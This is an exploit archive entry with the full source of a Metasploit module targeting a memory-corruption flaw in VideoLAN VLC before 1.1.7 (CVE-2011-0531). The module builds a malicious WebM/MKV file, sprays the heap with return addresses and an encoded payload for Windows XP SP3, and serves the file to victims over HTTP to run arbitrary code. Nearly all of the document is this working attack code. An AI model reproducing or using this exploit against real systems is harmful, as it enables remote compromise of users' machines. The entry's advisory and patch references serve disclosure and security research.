VideoLAN VLC MKV Memory Corruption

2011-02-03T00:00:00
ID PACKETSTORM:98119
Type packetstorm
Reporter Dan Rosenberg
Modified 2011-02-03T00:00:00

Description

                                        
                                            `##  
# $Id: vlc_webm.rb 11692 2011-02-01 18:54:24Z jduck $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GoodRanking  
  
include Msf::Exploit::Remote::HttpServer::HTML  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'VideoLAN VLC MKV Memory Corruption',  
'Description' => %q{  
This module exploits an input validation error in VideoLAN VLC  
< 1.1.7. By creating a malicious MKV or WebM file, a remote attacker  
could execute arbitrary code.  
},  
'License' => MSF_LICENSE,  
'Author' => [ 'Dan Rosenberg' ],  
'Version' => '$Revision: 11692 $',  
'References' =>  
[  
[ 'OSVDB', '70698' ],  
[ 'CVE', '2011-0531' ],  
[ 'BID', '46060' ],  
[ 'URL', 'http://git.videolan.org/?p=vlc.git&a=commitdiff&h=59491dcedffbf97612d2c572943b56ee4289dd07&hp=f085cfc1c95b922e3c750ee93ec58c3f2d5f7456' ],  
[ 'URL', 'http://www.videolan.org/security/sa1102.html' ]  
],  
'Payload' =>  
{  
'Space' => 1024,  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Windows XP SP3', { 'Ret' => 0x05050505 } ],  
],  
'Privileged' => false,  
'DisclosureDate' => 'Jan 31, 2011',  
'DefaultTarget' => 0))  
end  
  
def autofilter  
false  
end  
  
def check_dependencies  
use_zlib  
end  
  
def on_request_uri(cli, request)  
  
return if ((p = regenerate_payload(cli)) == nil)  
  
# EBML Header  
file = "\x1A\x45\xDF\xA3" # EBML  
file << "\x01\x00\x00\x00"  
file << "\x00\x00\x00\x1F"  
file << "\x42\x86\x81\x01" # EBMLVersion = 1  
file << "\x42\xF7\x81\x01" # EBMLReadVersion = 1  
file << "\x42\xF2\x81\x04" # EBMLMaxIDLength = 4  
file << "\x42\xF3\x81\x08" # EBMLMaxSizeLength = 8  
file << "\x42\x82\x84\x77" # DocType = "webm"  
file << "\x65\x62\x6D"  
file << "\x42\x87\x81\x02" # DocTypeVersion = 2  
file << "\x42\x85\x81\x02" # DocTypeReadVersion = 2  
  
# Segment data  
file << "\x18\x53\x80\x67" # (0) Segment  
file << "\x01\x00\x00\x00"  
file << "\x01\xD6\x22\xF1"  
  
# Seek data  
file << "\x11\x4D\x9B\x74" # (1) SeekHead  
file << "\x40\x3F"  
  
file << "\x4D\xBB\x8B" # (2) Seek  
file << "\x53\xAB\x84" # (3) SeekID = Segment Info  
file << "\x15\x49\xA9\x66" #  
  
file << "\x53\xAC\x81" # (3) SeekPosition  
file << "\xff" # index of segment info  
  
file << "\x53\xAB\x84" # (3) SeekID = Tracks  
file << "\x16\x54\xAE\x6B" #  
  
file << "\x42" * 228 # Padding  
  
# Data  
file << "\x15\x49\xA9\x66" # (1) Segment Info  
file << "\x01\x00\x00\x00" #  
file << "\x01\xff\xff\xff" # This triggers our heap spray...  
file << [target.ret].pack('V') # Object address  
  
# Spray the heap  
file << ([target.ret].pack('V') * 0xa0000)  
file << payload.encoded  
file << ([target.ret].pack('V') * 0xa0000)  
file << payload.encoded  
file << ([target.ret].pack('V') * 0xa0000)  
file << payload.encoded  
file << ([target.ret].pack('V') * 0xa0000)  
file << payload.encoded  
  
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")  
  
send_response_html(cli, file, { 'Content-Type' => 'application/octet-stream' })  
  
handler(cli)  
  
end  
end  
`